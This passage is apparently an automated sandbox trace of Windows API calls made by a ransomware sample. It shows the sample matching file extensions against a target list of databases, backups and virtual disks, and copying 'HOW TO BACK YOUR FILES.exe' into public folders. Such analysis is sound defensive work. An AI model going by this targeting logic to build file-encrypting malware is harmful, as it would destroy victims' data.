(lpString1="ini", lpString2="rsd") returned -1 [0040.034] lstrlenW (lpString="sas7bdat") returned 8 [0040.034] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.034] lstrlenW (lpString="sbf") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.034] lstrlenW (lpString="scx") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.034] lstrlenW (lpString="sdb") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.034] lstrlenW (lpString="sdc") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.034] lstrlenW (lpString="sdf") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.034] lstrlenW (lpString="sis") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.034] lstrlenW (lpString="spq") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.034] lstrlenW (lpString="te") returned 2 [0040.034] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.034] lstrlenW (lpString="teacher") returned 7 [0040.034] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.034] lstrlenW (lpString="tmd") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.034] lstrlenW (lpString="tps") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.034] lstrlenW (lpString="trc") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.034] lstrlenW (lpString="trc") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.034] lstrlenW (lpString="trm") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.034] lstrlenW (lpString="udb") returned 3 [0040.034] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.034] lstrlenW (lpString="udl") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.035] lstrlenW (lpString="usr") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.035] lstrlenW (lpString="v12") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.035] lstrlenW (lpString="vis") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.035] lstrlenW (lpString="vpd") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.035] lstrlenW (lpString="vvv") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.035] lstrlenW (lpString="wdb") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.035] lstrlenW (lpString="wmdb") returned 4 [0040.035] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.035] lstrlenW (lpString="wrk") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.035] lstrlenW (lpString="xdb") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.035] lstrlenW (lpString="xld") returned 3 [0040.035] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.035] lstrlenW (lpString="xmlff") returned 5 [0040.035] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.035] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497f0ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497f0ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.035] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.035] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="aoldtz.exe") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="windows") returned -1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootmgr") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="temp") returned -1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="pagefile.sys") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ids.txt") returned 1 [0040.035] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat") returned 1 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="perflogs") returned 1 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="MSBuild") returned 1 [0040.036] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0040.036] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0040.036] lstrcpyW (in: lpString1=0x2e2e894, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0040.036] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0040.036] lstrlenW (lpString="Ares865") returned 7 [0040.036] lstrcmpiW (lpString1="rary-ms", lpString2="Ares865") returned 1 [0040.036] lstrlenW (lpString=".dll") returned 4 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".dll") returned 1 [0040.036] lstrlenW (lpString=".lnk") returned 4 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".lnk") returned 1 [0040.036] lstrlenW (lpString=".ini") returned 4 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".ini") returned 1 [0040.036] lstrlenW (lpString=".sys") returned 4 [0040.036] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".sys") returned 1 [0040.036] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0040.036] lstrlenW (lpString="bak") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0040.036] lstrlenW (lpString="ba_") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0040.036] lstrlenW (lpString="dbb") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0040.036] lstrlenW (lpString="vmdk") returned 4 [0040.036] lstrcmpiW (lpString1="y-ms", lpString2="vmdk") returned 1 [0040.036] lstrlenW (lpString="rar") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0040.036] lstrlenW (lpString="zip") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0040.036] lstrlenW (lpString="tgz") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0040.036] lstrlenW (lpString="vbox") returned 4 [0040.036] lstrcmpiW (lpString1="y-ms", lpString2="vbox") returned 1 [0040.036] lstrlenW (lpString="vdi") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0040.036] lstrlenW (lpString="vhd") returned 3 [0040.036] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0040.036] lstrlenW (lpString="vhdx") returned 4 [0040.037] lstrcmpiW (lpString1="y-ms", lpString2="vhdx") returned 1 [0040.037] lstrlenW (lpString="avhd") returned 4 [0040.037] lstrcmpiW (lpString1="y-ms", lpString2="avhd") returned 1 [0040.037] lstrlenW (lpString="db") returned 2 [0040.037] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0040.037] lstrlenW (lpString="db2") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0040.037] lstrlenW (lpString="db3") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0040.037] lstrlenW (lpString="dbf") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0040.037] lstrlenW (lpString="mdf") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0040.037] lstrlenW (lpString="mdb") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0040.037] lstrlenW (lpString="sql") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0040.037] lstrlenW (lpString="sqlite") returned 6 [0040.037] lstrcmpiW (lpString1="ary-ms", lpString2="sqlite") returned -1 [0040.037] lstrlenW (lpString="sqlite3") returned 7 [0040.037] lstrcmpiW (lpString1="rary-ms", lpString2="sqlite3") returned -1 [0040.037] lstrlenW (lpString="sqlitedb") returned 8 [0040.037] lstrcmpiW (lpString1="brary-ms", lpString2="sqlitedb") returned -1 [0040.037] lstrlenW (lpString="xml") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0040.037] lstrlenW (lpString="$er") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0040.037] lstrlenW (lpString="4dd") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0040.037] lstrlenW (lpString="4dl") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0040.037] lstrlenW (lpString="^^^") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0040.037] lstrlenW (lpString="abs") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0040.037] lstrlenW (lpString="abx") returned 3 [0040.037] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0040.037] lstrlenW (lpString="accdb") returned 5 [0040.037] lstrcmpiW (lpString1="ry-ms", lpString2="accdb") returned 1 [0040.038] lstrlenW (lpString="accdc") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accdc") returned 1 [0040.038] lstrlenW (lpString="accde") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accde") returned 1 [0040.038] lstrlenW (lpString="accdr") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accdr") returned 1 [0040.038] lstrlenW (lpString="accdt") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accdt") returned 1 [0040.038] lstrlenW (lpString="accdw") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accdw") returned 1 [0040.038] lstrlenW (lpString="accft") returned 5 [0040.038] lstrcmpiW (lpString1="ry-ms", lpString2="accft") returned 1 [0040.038] lstrlenW (lpString="adb") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0040.038] lstrlenW (lpString="adb") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0040.038] lstrlenW (lpString="ade") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0040.038] lstrlenW (lpString="adf") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0040.038] lstrlenW (lpString="adn") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0040.038] lstrlenW (lpString="adp") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0040.038] lstrlenW (lpString="alf") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0040.038] lstrlenW (lpString="ask") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0040.038] lstrlenW (lpString="btr") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0040.038] lstrlenW (lpString="cat") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0040.038] lstrlenW (lpString="cdb") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0040.038] lstrlenW (lpString="ckp") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0040.038] lstrlenW (lpString="cma") returned 3 [0040.038] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0040.039] lstrlenW (lpString="cpd") returned 3 [0040.039] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0040.039] lstrlenW (lpString="dacpac") returned 6 [0040.039] lstrcmpiW (lpString1="ary-ms", lpString2="dacpac") returned -1 [0040.039] lstrlenW (lpString="dad") returned 3 [0040.039] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0040.039] lstrlenW (lpString="dadiagrams") returned 10 [0040.039] lstrcmpiW (lpString1="library-ms", lpString2="dadiagrams") returned 1 [0040.039] lstrlenW (lpString="daschema") returned 8 [0040.039] lstrcmpiW (lpString1="brary-ms", lpString2="daschema") returned -1 [0040.039] lstrlenW (lpString="db-journal") returned 10 [0040.039] lstrcmpiW (lpString1="library-ms", lpString2="db-journal") returned 1 [0040.039] lstrlenW (lpString="db-shm") returned 6 [0040.039] lstrcmpiW (lpString1="ary-ms", lpString2="db-shm") returned -1 [0040.039] lstrlenW (lpString="db-wal") returned 6 [0040.039] lstrcmpiW (lpString1="ary-ms", lpString2="db-wal") returned -1 [0040.039] lstrlenW (lpString="dbc") returned 3 [0040.039] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0040.039] lstrlenW (lpString="dbs") returned 3 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0040.053] lstrlenW (lpString="dbt") returned 3 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0040.053] lstrlenW (lpString="dbv") returned 3 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0040.053] lstrlenW (lpString="dbx") returned 3 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0040.053] lstrlenW (lpString="dcb") returned 3 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0040.053] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0040.054] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0040.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd028 | out: hHeap=0x2b0000) returned 1 [0040.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0040.054] lstrlenW (lpString="C:\\Users\\Public\\Favorites") returned 25 [0040.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0040.054] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.058] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.058] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0040.058] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.058] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.058] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.058] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.059] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.059] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.059] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.059] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.059] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.059] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.059] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498632e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0040.059] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0040.059] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0040.059] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Downloads", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0040.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccfe8 | out: hHeap=0x2b0000) returned 1 [0040.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0040.059] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0040.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0040.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Downloads\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\downloads\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.070] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.070] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49889440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfe8 [0040.070] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.070] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.071] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.071] FindNextFileW (in: hFindFile=0x2ccfe8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49889440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.071] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.071] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.071] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.071] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.071] FindNextFileW (in: hFindFile=0x2ccfe8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.071] lstrlenW (lpString="desktop.ini") returned 11 [0040.071] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\*") returned 27 [0040.071] lstrcpyW (in: lpString1=0x2e2e894, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.071] lstrlenW (lpString="desktop.ini") returned 11 [0040.071] lstrlenW (lpString="Ares865") returned 7 [0040.071] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.071] lstrlenW (lpString=".dll") returned 4 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.071] lstrlenW (lpString=".lnk") returned 4 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.071] lstrlenW (lpString=".ini") returned 4 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.071] lstrlenW (lpString=".sys") returned 4 [0040.071] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.071] lstrlenW (lpString="desktop.ini") returned 11 [0040.072] lstrlenW (lpString="bak") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.072] lstrlenW (lpString="ba_") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.072] lstrlenW (lpString="dbb") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.072] lstrlenW (lpString="vmdk") returned 4 [0040.072] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.072] lstrlenW (lpString="rar") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.072] lstrlenW (lpString="zip") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.072] lstrlenW (lpString="tgz") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.072] lstrlenW (lpString="vbox") returned 4 [0040.072] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.072] lstrlenW (lpString="vdi") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.072] lstrlenW (lpString="vhd") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.072] lstrlenW (lpString="vhdx") returned 4 [0040.072] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.072] lstrlenW (lpString="avhd") returned 4 [0040.072] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.072] lstrlenW (lpString="db") returned 2 [0040.072] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.072] lstrlenW (lpString="db2") returned 3 [0040.072] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.072] lstrlenW (lpString="db3") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.073] lstrlenW (lpString="dbf") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.073] lstrlenW (lpString="mdf") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.073] lstrlenW (lpString="mdb") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.073] lstrlenW (lpString="sql") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.073] lstrlenW (lpString="sqlite") returned 6 [0040.073] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.073] lstrlenW (lpString="sqlite3") returned 7 [0040.073] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.073] lstrlenW (lpString="sqlitedb") returned 8 [0040.073] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.073] lstrlenW (lpString="xml") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.073] lstrlenW (lpString="$er") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.073] lstrlenW (lpString="4dd") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.073] lstrlenW (lpString="4dl") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.073] lstrlenW (lpString="^^^") returned 3 [0040.073] lstrcmpiW 